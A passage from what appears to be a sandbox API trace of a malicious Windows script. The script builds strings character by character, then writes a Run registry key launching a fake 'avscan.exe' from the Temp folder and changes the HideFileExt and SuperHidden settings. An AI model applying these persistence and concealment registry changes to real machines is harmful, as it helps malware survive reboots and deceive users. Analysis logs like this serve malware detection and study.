lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0085.069] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.069] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0085.069] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.069] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0085.070] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.070] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0085.070] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.070] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0085.070] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.070] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.071] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.071] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0085.071] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.071] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.071] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.072] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0085.072] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.072] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0085.072] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.072] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0085.073] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.073] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.073] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.073] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0085.074] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.074] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0085.074] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.074] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0085.074] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.074] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.075] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.075] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.075] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.075] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0085.076] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.076] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.076] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.076] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0085.076] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0085.077] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0xe56fe4, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0085.077] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.077] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.077] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.078] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0085.078] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.078] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe56fe4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0085.078] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.078] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0085.079] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.079] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0085.079] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.079] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe56fe4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0085.080] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.080] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0085.080] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.080] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.080] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.081] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe56fe4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0085.081] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.081] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0085.081] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.081] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0085.082] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.082] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0xe56fe4, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0085.082] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.082] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0085.083] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.083] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe56fe4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.083] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.084] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0085.084] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.084] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe56fe4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.084] VarCat (in: pvarLeft=0x28f524, pvarRight=0x28f674, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.084] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.085] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.085] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.085] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.085] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.085] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.085] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.085] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.086] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.086] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.086] VarSub (in: pvarLeft=0x28f5a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.087] FileSystemObject:IDispatch:Invoke (in: This=0x1072c3c, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f270*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f4ac, pExcepInfo=0x28f250, puArgErr=0x28f280 | out: pDispParams=0x28f270*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f4ac*(varType=0x8, wReserved1=0x0, wReserved2=0xf614, wReserved3=0x28, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f250*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f280*=0xe57974) returned 0x0 [0085.088] WshShell:IDispatch:GetIDsOfNames (in: This=0x1072dd0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f290*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f294 | out: rgDispId=0x28f294*=2001) returned 0x0 [0085.099] WshShell:IDispatch:Invoke (in: This=0x1072dd0, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f264*(rgvarg=([0]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0xf4bc, wReserved3=0x28, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", varVal2=0x28fa80), [1]=0x28f2bc*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\avscan", varVal2=0x753ef0d0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f244, puArgErr=0x28f274 | out: pDispParams=0x28f264*(rgvarg=([0]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0xf4bc, wReserved3=0x28, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", varVal2=0x28fa80), [1]=0x28f2bc*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\avscan", varVal2=0x753ef0d0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f244*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f274*=0x72a478d9) returned 0x0 [0085.102] WshShell:IDispatch:GetIDsOfNames (in: This=0x1072dd0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f280*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f284 | out: rgDispId=0x28f284*=2001) returned 0x0 [0085.102] WshShell:IDispatch:Invoke (in: This=0x1072dd0, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f5b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234, puArgErr=0x28f264 | out: pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f5b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f264*=0x72a478d9) returned 0x0 [0085.103] SysReAllocStringLen (in: pbstr=0x28eaf4*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x28eaf4*="kernel32.dll") returned 1 [0085.103] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.103] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x75a80000 [0085.104] GetLastError () returned 0x0 [0085.105] SetLastError (dwErrCode=0x0) [0085.109] GetProcAddress (hModule=0x75a80000, lpProcName="NlsGetCacheUpdateCount") returned 0x75aad34f [0085.110] WshShell:IDispatch:GetIDsOfNames (in: This=0x1072dd0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f280*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f284 | out: rgDispId=0x28f284*=2001) returned 0x0 [0085.110] WshShell:IDispatch:Invoke (in: This=0x1072dd0, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f524*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\SuperHidden", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234, puArgErr=0x28f264 | out: pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), 